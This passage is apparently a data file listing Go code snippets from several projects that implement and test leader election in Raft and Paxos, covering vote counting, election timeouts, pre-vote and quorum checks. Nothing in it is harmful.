{\n\t\t\tcase e, _ := <-s.server.Inbox():\n\t\t\t\t// received a message on server's inbox\n\t\t\t\tmsg := e.Msg\n\t\t\t\tif ae, ok := msg.(AppendEntry); ok { // AppendEntry\n\t\t\t\t\tacc = s.handleAppendEntry(e.Pid, &ae)\n\t\t\t\t} else if rv, ok := msg.(RequestVote); ok { // RequestVote\n\t\t\t\t\tacc = s.handleRequestVote(e.Pid, &rv)\n\n\t\t\t\t} else if grantV, ok := msg.(GrantVote); ok && grantV.VoteGranted {\n\t\t\t\t\tvotes[e.Pid] = true\n\t\t\t\t\ts.writeToLog(\"Received grantVote message from \" + strconv.Itoa(e.Pid) + \" with term #\" + strconv.Itoa(grantV.Term))\n\t\t\t\t\ts.writeToLog(\"Votes received so far \" + strconv.Itoa(len(votes)))\n\t\t\t\t\tif len(votes) == len(peers)/2+1 { // received majority votes\n\t\t\t\t\t\ts.setState(LEADER)\n\t\t\t\t\t\ts.sendHeartBeat()\n\t\t\t\t\t\tacc = true\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\tcase <-s.eTimeout.C:\n\t\t\t\t// received timeout on election timer\n\t\t\t\ts.writeToLog(\"Received re-election timeout\")\n\t\t\t\tacc = true\n\t\t\tdefault:\n\t\t\t\ttime.Sleep(1 * time.Millisecond) // sleep to avoid busy looping\n\t\t\t}\n\n\t\t\tif acc {\n\t\t\t\ts.eTimeout.Reset(candidateTimeout * time.Millisecond) // start re-election timer\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t}\n}", "func TestFreeStuckCandidateWithCheckQuorum(t *testing.T) {\n\ta := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tb := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tc := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(a)\n\tdefer closeAndFreeRaft(b)\n\tdefer closeAndFreeRaft(c)\n\n\ta.checkQuorum = true\n\tb.checkQuorum = true\n\tc.checkQuorum = true\n\n\tnt := newNetwork(a, b, c)\n\tsetRandomizedElectionTimeout(b, b.electionTimeout+1)\n\n\tfor i := 0; i < b.electionTimeout; i++ {\n\t\tb.tick()\n\t}\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tnt.isolate(1)\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\n\tif c.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateCandidate)\n\t}\n\n\tif c.Term != b.Term+1 {\n\t\tt.Errorf(\"term = %d, want %d\", c.Term, b.Term+1)\n\t}\n\n\t// Vote again for safety\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\n\tif c.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateCandidate)\n\t}\n\n\tif c.Term != b.Term+2 {\n\t\tt.Errorf(\"term = %d, want %d\", c.Term, b.Term+2)\n\t}\n\n\tnt.recover()\n\tnt.send(pb.Message{From: 1, To: 3, Type: pb.MsgHeartbeat, Term: a.Term})\n\n\t// Disrupt the leader so that the stuck peer is freed\n\tif a.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", a.state, StateFollower)\n\t}\n\n\tif c.Term != a.Term {\n\t\tt.Errorf(\"term = %d, want %d\", c.Term, a.Term)\n\t}\n\n\t// Vote again, should become leader this time\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\n\tif c.state != StateLeader {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", c.state, StateLeader)\n\t}\n\n}", "func testNonleaderElectionTimeoutRandomized(t *testing.T, state StateType) {\n\tet := 10\n\tr := newTestRaft(1, []uint64{1, 2, 3}, et, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\ttimeouts := make(map[int]bool)\n\tfor round := 0; round < 50*et; round++ {\n\t\tswitch state {\n\t\tcase StateFollower:\n\t\t\tr.becomeFollower(r.Term+1, 2)\n\t\tcase StateCandidate:\n\t\t\tr.becomeCandidate()\n\t\t}\n\n\t\ttime := 0\n\t\tfor len(r.readMessages()) == 0 {\n\t\t\tr.tick()\n\t\t\ttime++\n\t\t}\n\t\ttimeouts[time] = true\n\t}\n\n\tfor d := et + 1; d < 2*et; d++ {\n\t\tif !timeouts[d] {\n\t\t\tt.Errorf(\"timeout in %d ticks should happen\", d)\n\t\t}\n\t}\n}", "func testCandidateResetTerm(t *testing.T, mt pb.MessageType) {\n\ta := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tb := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tc := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\n\tnt := newNetwork(a, b, c)\n\tdefer nt.closeAll()\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\tif a.state != StateLeader {\n\t\tt.Errorf(\"state = %s, want %s\", a.state, StateLeader)\n\t}\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\tif c.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateFollower)\n\t}\n\n\t// isolate 3 and increase term in rest\n\tnt.isolate(3)\n\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tif a.state != StateLeader {\n\t\tt.Errorf(\"state = %s, want %s\", a.state, StateLeader)\n\t}\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\n\t// trigger campaign in isolated c\n\tc.resetRandomizedElectionTimeout()\n\tfor i := 0; i < c.randomizedElectionTimeout; i++ {\n\t\tc.tick()\n\t}\n\n\tif c.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateCandidate)\n\t}\n\n\tnt.recover()\n\n\t// leader sends to isolated candidate\n\t// and expects candidate to revert to follower\n\tnt.send(pb.Message{From: 1, To: 3, Term: a.Term, Type: mt})\n\n\tif c.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateFollower)\n\t}\n\n\t// follower c term is reset with leader's\n\tif a.Term != c.Term {\n\t\tt.Errorf(\"follower term expected same term as leader's %d, got %d\", a.Term, c.Term)\n\t}\n}", "func TestLeaderElectionReceiveMessages(t *testing.T) {\n\tp := newPaxos(&Config{ID: 1, NodeCount: 5})\n\n\tif p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected unset progress timer\")\n\t}\n\tif p.prepare != nil {\n\t\tt.Fatalf(\"expected nil *pb.Prepare\")\n\t}\n\tif exp, a := uint64(0), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d; found %d\", exp, a)\n\t}\n\tassertLeaderElectionState := func(expLastAttempted, expViewChanges int) {\n\t\tassertState(t, p, StateLeaderElection)\n\t\tif exp, a := uint64(expLastAttempted), p.lastAttempted; a != exp {\n\t\t\tt.Fatalf(\"expected last attempted view %d; found %d\", exp, a)\n\t\t}\n\t\tif exp, a := expViewChanges, len(p.viewChanges); a != exp {\n\t\t\tt.Fatalf(\"expected %d ViewChange message, found %d\", exp, a)\n\t\t}\n\t}\n\tassertLeaderElectionState(1, 1)\n\n\t// ViewChange message from node 0 should be applied successfully.\n\tvc := &pb.ViewChange{NodeId: 0, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// Replayed ViewChange message should be ignored. Idempotent.\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message from self should be ignored.\n\tvc = &pb.ViewChange{NodeId: 1, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message for past view should be ignored.\n\tvc = &pb.ViewChange{NodeId: 2, AttemptedView: 0}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message from node 2 should be applied successfully.\n\t// Leader election should complete, because quorum of 3 nodes achieved.\n\tvc = &pb.ViewChange{NodeId: 2, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 3)\n\tif exp, a := uint64(1), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d after leader election; found %d\", exp, a)\n\t}\n\tif !p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected progress timer to be set after completed leader election\")\n\t}\n\n\t// The rest of the ViewChange messages should be ignored.\n\tvc = &pb.ViewChange{NodeId: 3, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tvc = &pb.ViewChange{NodeId: 4, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 3)\n}", "func TestPreVoteWithCheckQuorum(t *testing.T) {\n\tn1 := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn2 := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn3 := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\tn3.becomeFollower(1, None)\n\n\tn1.preVote = true\n\tn2.preVote = true\n\tn3.preVote = true\n\n\tn1.checkQuorum = true\n\tn2.checkQuorum = true\n\tn3.checkQuorum = true\n\n\tnt := newNetwork(n1, n2, n3)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// isolate node 1. node 2 and node 3 have leader info\n\tnt.isolate(1)\n\n\t// check state\n\tsm := nt.peers[1].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Fatalf(\"peer 1 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Fatalf(\"peer 2 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Fatalf(\"peer 3 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\n\t// node 2 will ignore node 3's PreVote\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// Do we have a leader?\n\tif n2.state != StateLeader && n3.state != StateFollower {\n\t\tt.Errorf(\"no leader\")\n\t}\n}", "func testLeaderCycle(t *testing.T, preVote bool) {\n\tvar cfg func(*Config)\n\tif preVote {\n\t\tcfg = preVoteConfig\n\t}\n\tn := newNetworkWithConfig(cfg, nil, nil, nil)\n\tdefer n.closeAll()\n\tfor campaignerID := uint64(1); campaignerID <= 3; campaignerID++ {\n\t\tn.send(pb.Message{From: campaignerID, To: campaignerID, Type: pb.MsgHup})\n\n\t\tfor _, peer := range n.peers {\n\t\t\tsm := peer.(*raft)\n\t\t\tif sm.id == campaignerID && sm.state != StateLeader {\n\t\t\t\tt.Errorf(\"preVote=%v: campaigning node %d state = %v, want StateLeader\",\n\t\t\t\t\tpreVote, sm.id, sm.state)\n\t\t\t} else if sm.id != campaignerID && sm.state != StateFollower {\n\t\t\t\tt.Errorf(\"preVote=%v: after campaign of node %d, \"+\n\t\t\t\t\t\"node %d had state = %v, want StateFollower\",\n\t\t\t\t\tpreVote, campaignerID, sm.id, sm.state)\n\t\t\t}\n\t\t}\n\t}\n}", "func TestOnlineElection(t *testing.T) {\n\tvar cases = []struct {\n\t\tpersons []int\n\t\ttimes []int\n\t\tq []int\n\t\ta []int\n\t}{\n\t\t//{\n\t\t//\tpersons: []int{0, 1, 1, 0, 0, 1, 0},\n\t\t//\ttimes: []int{0, 5, 10, 15, 20, 25, 30},\n\t\t//\tq: []int{3, 12, 25, 15, 24, 8},\n\t\t//\ta: []int{0, 1, 1, 0, 0, 1},\n\t\t//},\n\t\t{\n\t\t\tpersons: []int{0, 1, 0, 1, 1},\n\t\t\ttimes: []int{24, 29, 31, 76, 81},\n\t\t\tq: []int{28, 24, 29, 77, 30, 25, 76, 75, 81, 80},\n\t\t\ta: []int{0, 0, 1, 1, 1, 0, 1, 0, 1, 1},\n\t\t},\n\t}\n\tfor _, c := range cases {\n\t\tvote := Constructor(c.persons, c.times)\n\t\tfor i := 0; i < len(c.q); i++ {\n\t\t\tif vote.Q(c.q[i]) != c.a[i] {\n\t\t\t\tt.Fail()\n\t\t\t}\n\t\t}\n\t}\n}", "func (r *Raft) CallElection(){\n\t\n\tr.CurrentTerm+=1 // increase the current term by 1 to avoid conflict\n\tVoteAckcount:=1 // Number of vote received, initialised to 1 as own vote fo candiate is positive\n\tr.IsLeader = 0 // Set the state of server as candiate\n\tvar VoteCount =make (chan int,(len(r.ClusterConfigV.Servers)-1))\n\t//fmt.Println(\"Sending vote requests for:\",r.Id)\n\t\n\tfor _,server := range r.ClusterConfigV.Servers {\t\t\t\n\t\t\t\tif server.Id != r.Id{\n\t\t\t\t\tgo r.sendVoteRequestRpc(server,VoteCount) \t\t\t\t\t\n\t\t\t\t}}\n\n\tfor i:=0;i< len(r.ClusterConfigV.Servers)-1;i++ {\n\t\t\t\t\tVoteAckcount = VoteAckcount+ <- VoteCount \n\t\t\t\t\t// if Candiate gets majoirty, declare candiate as Leader and send immediae heartbeat to followers declaring\n\t\t\t\t\t// election of new leader\n\t\t\t\tif VoteAckcount > (len(r.ClusterConfigV.Servers)/2) && r.IsLeader == 0 { \n\t\t\t\t\tlog.Println(\"New leader is:\",r.Id)\n\t\t\t\t\tr.IsLeader=1\n\t\t\t\t\tr.LeaderId=r.Id\n\t\t\t\t\traft.SendImmediateHeartBit <- 1\n\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\t\t\n\t\tif r.IsLeader==1{\n\t\t\t// initlised next index to lastlog index, and match index to 0 fro all servers\n\t\tfor _,server := range r.ClusterConfigV.Servers {\n\t\t\t\tr.NextIndex[server.Id]=len(r.Log)\n\t\t\t\tr.MatchIndex[server.Id]=0\n\t\t\t\tr.ResetTimer()\n\t\t\t}\n\t\t}else{ \n\t\t\t// Is candidate fails to get elected, fall back to follower state and reset timer for reelection \n\t\t\tr.IsLeader=2\n\t\t\tr.ResetTimer()\n\t\t}\n}", "func newPreVoteMigrationCluster(t *testing.T) *network {\n\tn1 := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn2 := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn3 := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\tn3.becomeFollower(1, None)\n\n\tn1.preVote = true\n\tn2.preVote = true\n\t// We intentionally do not enable PreVote for n3, this is done so in order\n\t// to simulate a rolling restart process where it's possible to have a mixed\n\t// version cluster with replicas with PreVote enabled, and replicas without.\n\n\tnt := newNetwork(n1, n2, n3)\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// Cause a network partition to isolate n3.\n\tnt.isolate(3)\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\n\t// check state\n\t// n1.state == StateLeader\n\t// n2.state == StateFollower\n\t// n3.state == StateCandidate\n\tif n1.state != StateLeader {\n\t\tt.Fatalf(\"node 1 state: %s, want %s\", n1.state, StateLeader)\n\t}\n\tif n2.state != StateFollower {\n\t\tt.Fatalf(\"node 2 state: %s, want %s\", n2.state, StateFollower)\n\t}\n\tif n3.state != StateCandidate {\n\t\tt.Fatalf(\"node 3 state: %s, want %s\", n3.state, StateCandidate)\n\t}\n\n\t// check term\n\t// n1.Term == 2\n\t// n2.Term == 2\n\t// n3.Term == 4\n\tif n1.Term != 2 {\n\t\tt.Fatalf(\"node 1 term: %d, want %d\", n1.Term, 2)\n\t}\n\tif n2.Term != 2 {\n\t\tt.Fatalf(\"node 2 term: %d, want %d\", n2.Term, 2)\n\t}\n\tif n3.Term != 4 {\n\t\tt.Fatalf(\"node 3 term: %d, want %d\", n3.Term, 4)\n\t}\n\n\t// Enable prevote on n3, then recover the network\n\tn3.preVote = true\n\tnt.recover()\n\n\treturn nt\n}", "func testNonleadersElectionTimeoutNonconflict(t *testing.T, state StateType) {\n\tet := 10\n\tsize := 5\n\trs := make([]*raft, size)\n\tids := idsBySize(size)\n\tfor k := range rs {\n\t\trs[k] = newTestRaft(ids[k], ids, et, 1, NewMemoryStorage())\n\t}\n\tdefer func() {\n\t\tfor k := range rs {\n\t\t\tcloseAndFreeRaft(rs[k])\n\t\t}\n\t}()\n\tconflicts := 0\n\tfor round := 0; round < 1000; round++ {\n\t\tfor _, r := range rs {\n\t\t\tswitch state {\n\t\t\tcase StateFollower:\n\t\t\t\tr.becomeFollower(r.Term+1, None)\n\t\t\tcase StateCandidate:\n\t\t\t\tr.becomeCandidate()\n\t\t\t}\n\t\t}\n\n\t\ttimeoutNum := 0\n\t\tfor timeoutNum == 0 {\n\t\t\tfor _, r := range rs {\n\t\t\t\tr.tick()\n\t\t\t\tif len(r.readMessages()) > 0 {\n\t\t\t\t\ttimeoutNum++\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t// several rafts time out at the same tick\n\t\tif timeoutNum > 1 {\n\t\t\tconflicts++\n\t\t}\n\t}\n\n\tif g := float64(conflicts) / 1000; g > 0.3 {\n\t\tt.Errorf(\"probability of conflicts = %v, want <= 0.3\", g)\n\t}\n}", "func (rf *Raft) startElection() {\n\tDPrintf(\"%v become-candidate.start-election\", rf.raftInfo())\n\trf.state = RaftCandidate\n\trf.resetElectionTimeoutTicks()\n\n\trf.term++\n\trf.votedFor = rf.me\n\trf.persist()\n\n\trf.voteGranted = map[int]bool{}\n\trf.broadcastRequestVote()\n}", "func (r *Node) requestVotes(electionResults chan bool, fallbackChan chan bool, currTerm uint64) {\n\t// Votes received\n\tremaining := 0\n\tresultChan := make(chan RequestVoteResult)\n\tfor _, peer := range r.Peers {\n\t\tif r.Self.GetId() == peer.GetId() {\n\t\t\tcontinue\n\t\t}\n\t\tmsg := rpc.RequestVoteRequest{\n\t\t\tTerm: currTerm,\n\t\t\tCandidate: r.Self,\n\t\t\tLastLogIndex: r.LastLogIndex(),\n\t\t\tLastLogTerm: r.GetLog(r.LastLogIndex()).GetTermId(),\n\t\t}\n\t\tremaining++\n\t\tgo r.requestPeerVote(peer, &msg, resultChan)\n\t}\n\n\tvote := 1\n\treject := 0\n\tmajority := r.config.ClusterSize/2 + 1\n\tif vote >= majority {\n\t\telectionResults <- true\n\t\treturn\n\t}\n\tfor remaining > 0 {\n\t\trequestVoteResult := <-resultChan\n\t\tremaining--\n\t\tif requestVoteResult == RequestVoteFallback {\n\t\t\tfallbackChan <- true\n\t\t\treturn\n\t\t}\n\t\tif requestVoteResult == RequestVoteSuccess {\n\t\t\tvote++\n\t\t\tif vote >= majority {\n\t\t\t\telectionResults <- true\n\t\t\t\treturn\n\t\t\t}\n\t\t} else {\n\t\t\treject++\n\t\t\tif reject >= majority {\n\t\t\t\telectionResults <- false\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n}", "func TestLeaderElectionJumpToGreaterView(t *testing.T) {\n\tp := newPaxos(&Config{ID: 1, NodeCount: 5})\n\n\tif p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected unset progress timer\")\n\t}\n\tif p.prepare != nil {\n\t\tt.Fatalf(\"expected nil *pb.Prepare\")\n\t}\n\tif exp, a := uint64(0), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d; found %d\", exp, a)\n\t}\n\tassertLeaderElectionState := func(expLastAttempted, expViewChanges int) {\n\t\tassertState(t, p, StateLeaderElection)\n\t\tif exp, a := uint64(expLastAttempted), p.lastAttempted; a != exp {\n\t\t\tt.Fatalf(\"expected last attempted view %d; found %d\", exp, a)\n\t\t}\n\t\tif exp, a := expViewChanges, len(p.viewChanges); a != exp {\n\t\t\tt.Fatalf(\"expected %d ViewChange message, found %d\", exp, a)\n\t\t}\n\t}\n\tassertLeaderElectionState(1, 1)\n\n\t// ViewChange message from node 0 should be applied successfully.\n\tvc := &pb.ViewChange{NodeId: 0, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message for larger view should replace current attempt.\n\tvc = &pb.ViewChange{NodeId: 2, AttemptedView: 6}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(6, 2)\n\n\t// ViewChange message from node 1 should be applied successfully.\n\t// Leader election should complete, because quorum of 3 nodes achieved.\n\tvc = &pb.ViewChange{NodeId: 3, AttemptedView: 6}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(6, 3)\n\tif exp, a := uint64(6), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d after leader election; found %d\", exp, a)\n\t}\n\tif !p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected progress timer to be set after completed leader election\")\n\t}\n}", "func (r *Raft) runCandidate() {\n\t// Start vote for us, and set a timeout\n\tvoteCh := r.electSelf()\n\telectionTimeout := randomTimeout(r.conf.ElectionTimeout, 2*r.conf.ElectionTimeout)\n\n\t// Tally the votes, need a simple majority\n\tgrantedVotes := 0\n\tquorum := r.quorumSize()\n\tr.logD.Printf(\"Cluster size: %d, votes needed: %d\", len(r.peers)+1, quorum)\n\n\ttransition := false\n\tfor !transition {\n\t\tselect {\n\t\tcase rpc := <-r.rpcCh:\n\t\t\tswitch cmd := rpc.Command.(type) {\n\t\t\tcase *AppendEntriesRequest:\n\t\t\t\ttransition = r.appendEntries(rpc, cmd)\n\t\t\tcase *RequestVoteRequest:\n\t\t\t\ttransition = r.requestVote(rpc, cmd)\n\t\t\tdefault:\n\t\t\t\tr.logE.Printf(\"Candidate state, got unexpected command: %#v\",\n\t\t\t\t\trpc.Command)\n\t\t\t\trpc.Respond(nil, fmt.Errorf(\"unexpected command\"))\n\t\t\t}\n\n\t\t// Got response from peers on voting request\n\t\tcase vote := <-voteCh:\n\t\t\t// Check if the term is greater than ours, bail\n\t\t\tif vote.Term > r.getCurrentTerm() {\n\t\t\t\tr.logD.Printf(\"Newer term discovered\")\n\t\t\t\tr.setState(Follower)\n\t\t\t\tif err := r.setCurrentTerm(vote.Term); err != nil {\n\t\t\t\t\tr.logE.Printf(\"Failed to update current term: %w\", err)\n\t\t\t\t}\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\t// Check if the vote is granted\n\t\t\tif vote.Granted {\n\t\t\t\tgrantedVotes++\n\t\t\t\tr.logD.Printf(\"Vote granted. Tally: %d\", grantedVotes)\n\t\t\t}\n\n\t\t\t// Check if we've become the leader\n\t\t\tif grantedVotes >= quorum {\n\t\t\t\tr.logD.Printf(\"Election won. Tally: %d\", grantedVotes)\n\t\t\t\tr.setState(Leader)\n\t\t\t\treturn\n\t\t\t}\n\t\tcase a := <-r.applyCh:\n\t\t\t// Reject any operations since we are not the leader\n\t\t\ta.response = ErrNotLeader\n\t\t\ta.Response()\n\n\t\tcase <-electionTimeout:\n\t\t\t// Election failed! Restart the election. We simply return,\n\t\t\t// which will kick us back into runCandidate\n\t\t\tr.logW.Printf(\"Election timeout reached, restarting election\")\n\t\t\treturn\n\n\t\tcase <-r.shutdownCh:\n\t\t\treturn\n\t\t}\n\t}\n}", "func (n *Node) requestVotes(currTerm uint64) (fallback, electionResult bool) {\n\t// TODO: Students should implement this method\n\treturn\n}", "func TestRemoveLeader(t *testing.T) {\n\tdefer leaktest.AfterTest(t)\n\tstopper := stop.NewStopper()\n\tconst clusterSize = 6\n\tconst groupSize = 3\n\tcluster := newTestCluster(nil, clusterSize, stopper, t)\n\tdefer stopper.Stop()\n\n\t// Consume and apply the membership change events.\n\tfor i := 0; i < clusterSize; i++ {\n\t\tgo func(i int) {\n\t\t\tfor {\n\t\t\t\tif e, ok := <-cluster.events[i].MembershipChangeCommitted; ok {\n\t\t\t\t\te.Callback(nil)\n\t\t\t\t} else {\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}(i)\n\t}\n\n\t// Tick all the clocks in the background to ensure that all the\n\t// necessary elections are triggered.\n\t// TODO(bdarnell): newTestCluster should have an option to use a\n\t// real clock instead of a manual one.\n\tstopper.RunWorker(func() {\n\t\tticker := time.NewTicker(10 * time.Millisecond)\n\t\tdefer ticker.Stop()\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase <-stopper.ShouldStop():\n\t\t\t\treturn\n\t\t\tcase <-ticker.C:\n\t\t\t\tfor _, t := range cluster.tickers {\n\t\t\t\t\tt.NonBlockingTick()\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t})\n\n\t// Create a group with three members.\n\tgroupID := roachpb.RangeID(1)\n\tcluster.createGroup(groupID, 0, groupSize)\n\n\t// Move the group one node at a time from the first three nodes to\n\t// the last three. In the process, we necessarily remove the leader\n\t// and trigger at least one new election among the new nodes.\n\tfor i := 0; i < groupSize; i++ {\n\t\tlog.Infof(\"adding node %d\", i+groupSize)\n\t\tch := cluster.nodes[i].ChangeGroupMembership(groupID, makeCommandID(),\n\t\t\traftpb.ConfChangeAddNode,\n\t\t\troachpb.ReplicaDescriptor{\n\t\t\t\tNodeID: cluster.nodes[i+groupSize].nodeID,\n\t\t\t\tStoreID: roachpb.StoreID(cluster.nodes[i+groupSize].nodeID),\n\t\t\t\tReplicaID: roachpb.ReplicaID(cluster.nodes[i+groupSize].nodeID),\n\t\t\t}, nil)\n\t\tif err := <-ch; err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\n\t\tlog.Infof(\"removing node %d\", i)\n\t\tch = cluster.nodes[i].ChangeGroupMembership(groupID, makeCommandID(),\n\t\t\traftpb.ConfChangeRemoveNode,\n\t\t\troachpb.ReplicaDescriptor{\n\t\t\t\tNodeID: cluster.nodes[i].nodeID,\n\t\t\t\tStoreID: roachpb.StoreID(cluster.nodes[i].nodeID),\n\t\t\t\tReplicaID: roachpb.ReplicaID(cluster.nodes[i].nodeID),\n\t\t\t}, nil)\n\t\tif err := <-ch; err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\t}\n}", "func TestLearnerElectionTimeout(t *testing.T) {\n\tn1 := newTestLearnerRaft(1, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tn2 := newTestLearnerRaft(2, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\n\t// n2 is learner. Learner should not start election even when times out.\n\tsetRandomizedElectionTimeout(n2, n2.electionTimeout)\n\tfor i := 0; i < n2.electionTimeout; i++ {\n\t\tn2.tick()\n\t}\n\n\tif n2.state != StateFollower {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", n2.state, StateFollower)\n\t}\n}", "func TestKillLeader(t *testing.T) {\n\tprocAttr := new(os.ProcAttr)\n\tprocAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}\n\n\tclusterSize := 5\n\targGroup, etcds, err := createCluster(clusterSize, procAttr, false)\n\n\tif err != nil {\n\t\tt.Fatal(\"cannot create cluster\")\n\t}\n\n\tdefer destroyCluster(etcds)\n\n\tleaderChan := make(chan string, 1)\n\n\ttime.Sleep(time.Second)\n\n\tgo leaderMonitor(clusterSize, 1, leaderChan)\n\n\tvar totalTime time.Duration\n\n\tleader := \"http://127.0.0.1:7001\"\n\n\tfor i := 0; i < clusterSize; i++ {\n\t\tfmt.Println(\"leader is \", leader)\n\t\tport, _ := strconv.Atoi(strings.Split(leader, \":\")[2])\n\t\tnum := port - 7001\n\t\tfmt.Println(\"kill server \", num)\n\t\tetcds[num].Kill()\n\t\tetcds[num].Release()\n\n\t\tstart := time.Now()\n\t\tfor {\n\t\t\tnewLeader := <-leaderChan\n\t\t\tif newLeader != leader {\n\t\t\t\tleader = newLeader\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\ttake := time.Now().Sub(start)\n\n\t\ttotalTime += take\n\t\tavgTime := totalTime / (time.Duration)(i+1)\n\n\t\tfmt.Println(\"Leader election time is \", take, \"with election timeout\", ElectionTimeout)\n\t\tfmt.Println(\"Leader election time average is\", avgTime, \"with election timeout\", ElectionTimeout)\n\t\tetcds[num], err = os.StartProcess(\"etcd\", argGroup[num], procAttr)\n\t}\n}", "func TestRaftNewLeader(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tclusterPrefix := \"TestRaftNewLeader\"\n\n\t// Create n1 node.\n\tstorage := NewStorage(NewMemSnapshotMgr(), NewMemLog(), NewMemState(0))\n\tfsm1 := newTestFSM(ID1)\n\t// NOTE we use different cluster ID for nodes within same cluster to avoid\n\t// registering same metric path twice. This should never happen in real world\n\t// because we'll never run nodes of a same cluster within one process.\n\tn1 := testCreateRaftNode(getTestConfig(ID1, clusterPrefix+ID1), storage)\n\t// Create n2 node.\n\tstorage = NewStorage(NewMemSnapshotMgr(), NewMemLog(), NewMemState(0))\n\tfsm2 := newTestFSM(ID2)\n\tn2 := 